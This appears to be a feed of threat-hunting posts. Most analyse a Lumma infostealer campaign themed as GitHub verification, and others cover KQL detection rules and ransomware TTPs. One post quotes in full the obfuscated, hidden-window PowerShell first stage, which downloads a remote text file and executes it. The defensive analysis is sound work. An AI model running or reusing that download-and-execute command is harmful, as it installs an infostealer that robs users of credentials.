#Lumma #infosec #malware #blueteam #Threathunting

This final execution of the malware seems a new way to obfuscate downloadstring dynamically. they load the ULR in a variable and then dynamically resolve function names for download and downloadstring .#Lumma #infosec #malware #blueteam.ChaGPT explanation follows

New lumma variant .with tons of new techniques they use to obfuscate the malware .#Lumma #infosec #malware #blueteam.

RT @inversecos: NEW LAB: Abu Jibal (APT34 / OilRig) 🔍💻. Iranian APT34 targets the oil and gas sector across the Middle East. Test your b….

RT @FullHunt: New FullHunt features coming up! Stay tuned…. 🥁🚀.

Chatgpt extracted TTPs on the ransomware negotiation chat .

Based on the report I have created 2 new detection rules .- Detects usage of bublup[.]com for exfiltration .- detection of unsigned binaries executing from suspicious locations.#KQL #Threathunting #ATP.

Asked chatgpt to summarize the TTPs based on the chat log for each threat group. sample screenshot

From Akira Ransomware negotiation chats this seems the generic response they give as how they compromised victims. #Blueteam #SOC #ransomware

Even the most advanced TAs leave traces. Great analysis by @citizenlab team.

Based on Conti leaks here is a KQL to detect 7z usage to interact with common lateral movement shares .my repo didn't have lateral movement part will be adding more.you can get at KQLsearch here.#KQL #ThreatHunting #SOC #blueteam.

Based on the intel report screenshot below from Microsoft. I had added detection rules to my KQL repo .Same queries can be found in see screenshot .#ATP #ThreatHunting #KQL #SOC

Notification were received by victims around the world this week. the mentioned article is for what you need to do when you get one of those.

Apple threat notifications received this week, likely compromised users in 117 countries. "Today’s notification is being sent to targeted users in 117 countries".

This leads to the final stage which is the actually Lumma binary here ec539c4a9c60b3690fbd891e19333362.#Lumma #infostealer #SOC #Blueteam.

The PS file then proceeds to execute the expanded executable. create a persistent key named NetUtilityApp that point toe the highlighted location. the expanded folder show below.#Lumma #infostealer #SOC #Blueteam

The powershell script checks for existence of YrsbtdxL folder in appdata then proceeds to decode the powershell blob write it to disk and then expand it see highlighted areas.#Lumma #github #infostealer

The threat actor decided to move away from directly downloading archive files to self contained powershell scripts resulting in a download of 21MB plus text file.#Lumma #github #infostealer

First "PowerShell.exe" -w HiDden "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmV3NjQub3NzLWFwLXNvdXRoZWFzdC0xLmFsaXl1bmNzLmNvbS9HcUhRV05Ndi50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex".b4 decoding.#Lumma #github #infostealer

Monday and as always new Lumma same github verification campaign theme but with a different second /third stage. Sample can be found here and below tweets a bit of analysis.##Lumma #Infostealer #Github.